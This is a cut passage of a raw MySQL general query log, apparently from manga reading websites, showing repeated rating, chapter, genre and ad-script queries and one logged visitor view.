= '212' order by created desc 330642979 Quit 330642980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330642980 Quit 330642981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330642981 Quit 330642982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330642982 Quit 330642983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330642983 Quit 330642984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330642984 Quit 330642985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330642985 Quit 330642986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330642986 Quit 330642987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330642987 Quit 330642988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330642988 Quit 330642989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330642989 Quit 330642990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330642990 Quit 330642991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330642991 Quit 330642992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330642992 Quit 330642993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330642993 Quit 330642994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330642994 Quit 330642995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330642995 Quit 330642996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330642996 Quit 330642997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330642997 Quit 330642998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330642998 Quit 330642999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330642999 Quit 330643000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330643000 Quit 330643001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330643001 Quit 330643002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330643002 Quit 330643003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330643003 Quit 330643004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330643004 Quit 330643005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330643005 Quit 330643006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330643006 Quit 330643007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330643007 Quit 330643008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330643008 Quit 330643009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330643009 Quit 330643010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330643010 Quit 330643011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330643011 Quit 330643012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330643012 Quit 330643013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330643013 Quit 330643014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330643014 Quit 330643015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330643015 Quit 330643016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330643016 Quit 330643017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330643017 Quit 330643018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330643018 Quit 330643019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330643019 Quit 330643020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330643020 Quit 330643021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330643021 Quit 330643022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330643022 Quit 330643023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330643023 Quit 330643024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330643024 Quit 330643025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330643025 Quit 330643026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330643026 Quit 330643027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330643027 Quit 330643028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330643028 Quit 330643029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330643029 Quit 330643030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330643030 Quit 330643031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330643031 Quit 330643032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330643032 Quit 330643033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330643033 Quit 330643034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330643034 Quit 330643035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330643035 Quit 330643036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330643036 Quit 330643037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330643037 Quit 330643038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330643038 Quit 330643039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330643039 Quit 330643040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330643040 Quit 330643041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330643041 Quit 330643042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330643042 Quit 330643043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330643043 Quit 330643044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330643044 Quit 330643045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330643045 Quit 330643046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330643046 Quit 330643047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330643047 Quit 330643048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330643048 Quit 330643049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330643049 Quit 330643050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330643050 Quit 330643051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330643051 Quit 330643052 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330643052 Quit 330643053 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330643053 Quit 330643054 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330643054 Quit 330643055 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330643055 Quit 330643056 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330643056 Quit 330643057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330643057 Quit 330643058 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330643058 Quit 330643059 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330643059 Quit 330643060 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330643060 Quit 330643061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330643061 Quit 330643062 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643062 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330643062 Quit 330643063 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330643063 Quit 330643064 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330643064 Quit 330643065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330643065 Quit 330643066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330643066 Quit 330643067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330643067 Quit 330643068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330643068 Quit 330643069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330643069 Quit 330643070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330643070 Quit 330643071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330643071 Quit 330643072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330643072 Quit 330643073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330643073 Quit 330643074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330643074 Quit 330643075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330643075 Quit 330643076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330643076 Quit 330643077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330643077 Quit 330643078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330643078 Quit 330643079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330643079 Quit 330643080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330643080 Quit 330643081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330643081 Quit 330643082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330643082 Quit 330643083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330643083 Quit 330643084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330643084 Quit 330643085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330643085 Quit 330643086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330643086 Quit 330643087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330643087 Quit 330643088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330643088 Quit 330643089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330643089 Quit 330643090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330643090 Quit 330643091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330643091 Quit 330643092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330643092 Quit 330643093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330643093 Quit 330643094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330643094 Quit 330643095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330643095 Quit 330643096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330643096 Quit 330643097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330643097 Quit 330643098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330643098 Quit 330643099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330643099 Quit 330643100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330643100 Quit 330643101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643101 Quit 330643102 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643102 Quit 330642753 Quit 330643103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643103 Quit 330643104 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643104 Quit 330643105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643105 Quit 330643106 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643106 Quit 330643107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643107 Quit 330643108 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643108 Quit 330643109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643109 Quit 330643110 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643110 Quit 260225 19:28:16 330643111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643111 Quit 330643112 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9482' 330643112 Quit 260225 19:28:17 330643113 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643114 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643113 Quit 330643114 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '8349' and m.active = 1 330643114 Quit 330643115 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643115 Query select * FROM chapters where id = '8349' 330643115 Quit 330643116 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643116 Query select * FROM chapters where manga_id = '110' order by display_priority ASC, id desc 330643116 Quit 330643117 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643117 Query Update chapters set view=view+1 where id = '8349' 330643117 Quit 330643118 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643118 Query select * FROM chapters where id = '8349' 330643119 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643118 Quit 330643119 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '8349' and m.active = 1 330643119 Quit 330643120 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643120 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('110', '8349', '104.28.237.52', 'mangaberri.com', '2026-02-26 03:28:17', '2026-02-26 03:28:17') 330643120 Quit 330643121 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643121 Query select * FROM chapter_images where chapter_id = '8349' 330643121 Quit 330643122 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643122 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '110' and m.active = 1 330643122 Quit 330643123 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643123 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='110' and m.active = 1 AND (genres like '%Action%' OR genres like '%Horror%' OR genres like '%Sci-Fi%') ORDER BY RAND() limit 10 330643123 Quit 330643124 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643125 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643124 Quit 330643125 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643125 Quit 330643126 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643127 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643126 Quit 330643127 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643127 Quit 330643128 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643129 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643128 Quit 330643129 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643129 Quit 330643130 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643131 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643130 Quit 330643131 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643131 Quit 330643132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643132 Quit 330643133 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643133 Quit 330643134 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643135 Connect 